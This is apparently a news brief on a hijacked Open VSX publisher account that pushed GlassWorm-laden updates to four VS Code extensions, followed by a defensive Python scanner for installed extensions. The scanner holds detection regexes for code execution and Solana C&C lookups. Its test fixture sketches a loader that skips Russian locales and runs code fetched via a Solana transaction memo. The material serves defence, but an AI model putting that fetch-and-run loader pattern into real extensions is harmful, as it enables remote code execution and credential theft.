Open VSX Publisher Account Hijacked in Fresh GlassWorm Attack
Briefly

"On January 30, a threat actor published malicious versions of four established VS Code extensions with over 22,000 combined downloads. The extensions contained code that would execute at runtime, evade systems with Russian locales, resolve command-and-control (C&C) data from Solana transaction memos, and run additional code. Consistent with previously observed activity, the extensions were repurposed to deploy a GlassWorm loader, but the fresh attack did not rely on typosquatting or cloned tools."
""By contrast, these four extensions were published under an established publisher account with a multi-extension history and meaningful adoption signals across ecosystems," Socket notes. The publisher also maintains Visual Studio Marketplace listings with thousands of downloads, but the analyzed incident only concerns Open VSX extensions. "The threat actor published poisoned updates through an established publisher identity, and the Open VSX security team assessed the incident as consistent with leaked tokens or other unauthorized publishing access," Socket notes."
A publisher account on the Open VSX marketplace was compromised and malicious updates were pushed to four established VS Code extensions with over 22,000 combined downloads. The poisoned extensions contained code that executes at runtime, skips systems with a Russian locale, and retrieves command-and-control data from Solana transaction memos. The extensions were repurposed to deploy a GlassWorm loader; unlike earlier GlassWorm activity, this attack relied on a hijacked publisher identity rather than typosquatting or cloned tools, and the Open VSX security team assessed the compromise as consistent with leaked publishing tokens or other unauthorized publishing access. The loader targets macOS, profiles the system, and fetches a Node.js implant for data theft and persistence. The implant attempts to steal browser cookies, form history and login files, wallet-extension artifacts, Safari cookies, desktop wallet data, the macOS Keychain, Apple Notes, and FortiClient VPN data.
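As an added example, not code from SecurityWeek, Socket, or the Open VSX project: a triage script that walks a local VS Code or VSCodium extensions directory and greps each extension's JavaScript for the three behaviours the report attributes to the poisoned updates (Solana RPC lookups used to resolve C&C data from transaction memos, a Russian-locale gate, and runtime execution of fetched code). The regexes are heuristic indicators chosen for illustration, not IOCs published by anyone; the sample extensions it builds (publishers "acme" and "zeta") are constructed fixtures with no working network or execution logic, and a hit is a lead for manual review, not a verdict.

```python
"""Heuristic triage of installed VS Code / VSCodium extensions (added example)."""
import json
import re
import sys
import tempfile
from pathlib import Path

# Heuristic indicators for the behaviours the report attributes to the poisoned
# updates. These regexes are assumptions chosen for illustration, not IOCs
# published by Socket or Open VSX; a hit is a lead for review, not a verdict.
INDICATORS = {
    # Public Solana JSON-RPC hosts and the RPC calls needed to read memos
    # attached to a wallet's transactions.
    "solana_c2_lookup": re.compile(
        r"api\.(?:mainnet-beta|devnet|testnet)\.solana\.com"
        r"|getSignaturesForAddress|getTransaction\b|\bmemo\b", re.I),
    # Locale checks that would let a payload skip Russian-locale systems.
    "locale_gate": re.compile(
        r"ru[-_]RU|Intl\.DateTimeFormat|process\.env\.LANG\b|vscode\.env\.language", re.I),
    # Execution of code that was not shipped in the extension package.
    "dynamic_exec": re.compile(
        r"\beval\s*\(|new\s+Function\s*\(|child_process|vm\.runIn\w+Context"),
}
MIN_CATEGORIES = 2          # flag only when two independent behaviours co-occur
MAX_FILE_BYTES = 5_000_000  # skip huge bundles that would dominate run time
JS_SUFFIXES = {".js", ".cjs", ".mjs"}


def extension_id(ext_dir: Path) -> str:
    """publisher.name@version from package.json, or the directory name if unreadable."""
    try:
        pkg = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return ext_dir.name
    return f"{pkg.get('publisher', '?')}.{pkg.get('name', '?')}@{pkg.get('version', '?')}"


def scan_extension(ext_dir: Path) -> dict:
    """Collect distinct indicator matches per category over the extension's JS files."""
    hits = {cat: set() for cat in INDICATORS}
    for path in ext_dir.rglob("*"):
        if path.suffix not in JS_SUFFIXES or not path.is_file():
            continue
        if path.stat().st_size > MAX_FILE_BYTES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for cat, rx in INDICATORS.items():
            hits[cat].update(m.group(0) for m in rx.finditer(text))
    found = {cat: sorted(vals) for cat, vals in hits.items() if vals}
    return {
        "extension": extension_id(ext_dir),
        "path": str(ext_dir),
        "indicators": found,
        "flagged": len(found) >= MIN_CATEGORIES,
    }


def scan_extensions_root(root: Path) -> list[dict]:
    """Scan each extension directory under root, e.g. ~/.vscode/extensions."""
    return [scan_extension(d) for d in sorted(root.iterdir()) if d.is_dir()]


def build_demo_tree(root: Path) -> None:
    """Constructed fixtures: one benign extension, one mimicking the reported behaviour."""
    benign = root / "acme.hello-world-1.0.0"
    benign.mkdir()
    (benign / "package.json").write_text(json.dumps(
        {"publisher": "acme", "name": "hello-world", "version": "1.0.0"}))
    (benign / "extension.js").write_text(
        'const vscode = require("vscode");\n'
        'exports.activate = ctx => ctx.subscriptions.push(\n'
        '  vscode.commands.registerCommand("acme.hello", () => {}));\n')

    suspect = root / "zeta.linter-plus-2.3.1"
    (suspect / "dist").mkdir(parents=True)
    (suspect / "package.json").write_text(json.dumps(
        {"publisher": "zeta", "name": "linter-plus", "version": "2.3.1"}))
    # Skeleton only: the helpers it calls do not exist, so nothing here runs.
    (suspect / "dist" / "extension.js").write_text(
        'const RPC = "https://api.mainnet-beta.solana.com";\n'
        'async function activate() {\n'
        '  if (Intl.DateTimeFormat().resolvedOptions().locale.startsWith("ru-RU")) return;\n'
        '  const sigs = await rpc("getSignaturesForAddress", [WALLET]);\n'
        '  const tx = await rpc("getTransaction", [sigs[0].signature]);\n'
        '  const memo = parseMemo(tx); // memo field carries the next-stage location\n'
        '  new Function(await fetchText(memo))();\n'
        '}\n')


def demo() -> list[dict]:
    """Build the constructed fixtures in a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_demo_tree(root)
        return scan_extensions_root(root)


if __name__ == "__main__":
    results = scan_extensions_root(Path(sys.argv[1])) if len(sys.argv) > 1 else demo()
    for r in results:
        print("FLAG" if r["flagged"] else "ok  ", r["extension"], json.dumps(r["indicators"]))
```

Run it with the path to an extensions directory (`~/.vscode/extensions` or `~/.vscode-oss/extensions` for VSCodium, which is what Open VSX feeds) to list flagged extensions; with no argument it scans the two constructed fixtures. Requiring two indicator categories keeps a lone `child_process` call or a stray `memo` string from flagging ordinary extensions, at the cost of missing a payload that is split across separately loaded files.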
Read at SecurityWeek